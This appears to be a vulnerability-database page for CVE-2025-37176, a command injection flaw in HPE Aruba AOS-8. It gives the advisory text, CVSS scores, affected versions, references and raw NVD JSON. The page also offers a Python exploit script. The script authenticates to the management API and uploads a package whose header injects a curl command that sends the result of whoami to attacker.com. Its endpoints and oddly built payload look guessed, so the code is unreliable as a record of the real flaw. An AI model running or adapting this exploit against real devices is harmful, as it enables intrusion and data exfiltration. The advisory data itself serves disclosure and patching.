CVE-2025-37176

Description

A command injection vulnerability in AOS-8 allows an authenticated privileged user to alter a package header to inject shell commands, potentially affecting the execution of internal operations. Successful exploit could allow an authenticated malicious actor to execute commands with the privileges of the impacted mechanism.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE

HPE Aruba AOS-8 8.x 系列（具体版本需参考官方公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-37176 PoC - HPE Aruba AOS-8 Command Injection
# Requires high-privilege authenticated access to AOS-8 management interface

import requests
import base64

TARGET = "https://aruba-aos8-target.local"
USERNAME = "admin"
PASSWORD = "admin_password"

# Create malicious package with injected command in header
# The command will be executed when the package is processed
malicious_package = b'''
ARUBA_PACKAGE_HEADER_v1
Version: 8.10.0.0
Description: ;echo$(whoami)>$(curl${IFS}http://attacker.com/$(whoami))
Type: Software_Update
Platform: 8400X
Checksum: a1b2c3d4e5f6
'''

def exploit():
    """
    1. Authenticate to AOS-8 management interface
    2. Upload malicious package with injected command in header
    3. Trigger package processing to execute injected command
    """
    session = requests.Session()
    
    # Step 1: Login
    login_url = f"{TARGET}/v1/api/login"
    credentials = {"username": USERNAME, "password": PASSWORD}
    response = session.post(login_url, json=credentials, verify=False)
    
    if response.status_code != 200:
        print(f"[-] Authentication failed: {response.status_code}")
        return False
    
    print("[+] Successfully authenticated to AOS-8")
    
    # Step 2: Upload malicious package
    upload_url = f"{TARGET}/v1/api/package/upload"
    files = {"package": ("malicious.tar.gz", malicious_package, "application/octet-stream")}
    response = session.post(upload_url, files=files, verify=False)
    
    if response.status_code == 200:
        print("[+] Malicious package uploaded successfully")
        print("[*] Injected command will be executed during package processing")
        return True
    else:
        print(f"[-] Package upload failed: {response.status_code}")
        return False

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-37176
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-37176
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-37176/
[4] VulDB https://vuldb.com/cve/CVE-2025-37176
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-37176", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:05.717", "lastModified": "2026-01-23T16:12:02.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability in AOS-8 allows an authenticated privileged user to alter a package header to inject shell commands, potentially affecting the execution of internal operations. Successful exploit could allow an authenticated malicious actor to execute commands with the privileges of the impacted mechanism."}, {"lang": "es", "value": "Una vulnerabilidad de inyección de comandos en AOS-8 permite a un usuario privilegiado autenticado alterar una cabecera de paquete para inyectar comandos de shell, lo que podría afectar la ejecución de operaciones internas. Un exploit exitoso podría permitir a un actor malicioso autenticado ejecutar comandos con los privilegios del mecanismo afectado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.6.0.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "28EE6221-D715-48C4-B181-BD530080E706"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}